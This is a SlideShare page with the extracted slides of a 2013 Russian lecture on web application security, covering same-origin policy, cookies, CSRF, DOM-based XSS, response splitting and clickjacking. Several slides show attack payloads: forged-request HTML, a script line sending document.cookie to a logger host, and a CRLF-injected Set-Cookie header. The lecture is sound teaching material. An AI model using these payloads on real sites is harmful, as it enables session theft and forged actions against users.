Безопасность интернет-приложений осень 2013 лекция 4

363 views

Published on

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
363
On SlideShare
0
From Embeds
0
Number of Embeds
98
Actions
Shares
0
Downloads
15
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Безопасность интернет-приложений осень 2013 лекция 4

  1. 1. 2
  2. 2. - Браузер Место положения Открытые сессии Пользователь 3
  3. 3. PROTOCOL://DOMAIN:port Одинаковый источник: http://example.com/ http://example.com/folder/ Разный источник: http://example.com/ https://example.com/ http://test.example.com/ http://example.com:8080/ http://othersample.com/ 4
  4. 4. http://kiwi.com/test_restrict.html 5
  5. 5. http://kiwi.com/test_restrict.html 6
  6. 6. http://kiwi.com/test_restrict.html 7
  7. 7. http://kiwi.com/test_restrict.html 8
  8. 8. http://kiwi.com/test_restrict.html http://kiwi.com/src_restrict.html 9
  9. 9. http://www.kiwi.com/test_restrict.html 10
  10. 10. XMLHttpRequest - Метод запроса Заголовок запроса Чтение заголовков Чтение ответа 11
  11. 11. ограничения: - время жизни (expires,max-age) - локация (path, domain) - дополнительные аттрибуты (httponly, secure) ..domain=.target.com – любой поддомен target.com 12
  12. 12. 13
  13. 13. link code req1 req2 14
  14. 14. … <img src=‘http://target.com/killme?id=1’> … … <form action=‘http://target.com/killme’> <input type=hidden name=id value=1> </form> … <script>submitForm()</script> 15
  15. 15. link link Injected responce 16
  16. 16. 17
  17. 17. 18
  18. 18. 19
  19. 19. 20
  20. 20. 21
  21. 21. document.write() document.writeln() eval() .innerHTML etc flash: getURL(_root.param,”_blank”) 22
  22. 22. … new Image().src="http://logger.com/?c="+encodeURI(document.cookie); … 23
  23. 23. 24
  24. 24. 25
  25. 25. 26
  26. 26. 27
  27. 27. 28
  28. 28. http://target.com?jump=<user input> … Location: <user input> … http://target.com?jump=hell%0d%0aSet-Cookie: gotohell%3d1 … Location: hell Set-Cookie: gotohell=1 … 29
  29. 29. 30
  30. 30. Split (target.com/somevuln/) target.com target (target.com/admin/) 31
  31. 31. Split (target.com/somevuln/) target.com target (target.com/admin/) 32
  32. 32. target.com 33
  33. 33. target.com Fake target (target.com/admin/) … <form action=“evilsite.com”> … 34
  34. 34. Upgrade Upgrade 35
  35. 35. 36
  36. 36. ...style='position:absolute; left:0px; top:0px; z-index:10000;'... 37
  37. 37. 38

×